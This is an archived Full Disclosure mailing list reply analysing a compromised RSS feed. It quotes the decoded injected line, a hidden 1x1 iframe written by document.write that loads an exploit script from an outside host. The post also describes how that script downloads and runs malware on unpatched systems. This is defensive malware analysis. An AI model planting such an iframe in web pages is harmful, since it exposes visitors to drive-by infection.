|
Full Disclosure
mailing list archives
Re: PenTestIT.com RSS feed suspicius
From: Nick FitzGerald <nick () virus-l demon co uk>
Date: Wed, 06 Jul 2011 15:55:03 +1200
Andrew Farmer to ector dulac:
Looks suspicious to me
Very. That unescapes to:
document.write('<iframe src="http://innessphoto.com/forum.php?tp=675eafec431b1f72"; width="1" height="1"
frameborder="0"></iframe>')
Which loads some amusingly obfuscated JS ...
Really?
That amused you?
Maybe my irony detector is on the blink, but that was very ordinary
several years ago.
... which looks like it's
*supposed* to be a plugin exploit of some sort, but which has no
real payload. At least, not when I looked.
Ummmm -- not what I got at all.
I got a very old, very common multi-exploit script that, if successful,
(that is, if run on a sufficiently old, sufficiently unpatched, system)
would have downloaded and executed a PE that was only just very
recently (a bit less than three hours ago) submitted to VirusTotal,
with these results:
http://www.virustotal.com/file-scan/report.html?id=9a68644038cb4f6a0b3b2057c5cdf5a22898675ebc20baedc601dfc94d9fa3e1-1309914305
Of course, what you get served from any given "exploit script" URL can
vary greatly, from hour-to-hour, GeoIP-to-GeoIP, and equally amongst
apparent browser User-Agents (including OS (OS x vs. Windows vs.
others) and even OS version (XP vs. Vista/Win7), etc), HTTP referer
headers, presence or absense or contents of cookies, and so on and so
forth...
Regards,
Nick FitzGerald
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
 By Date 
By Thread
Current thread:
|
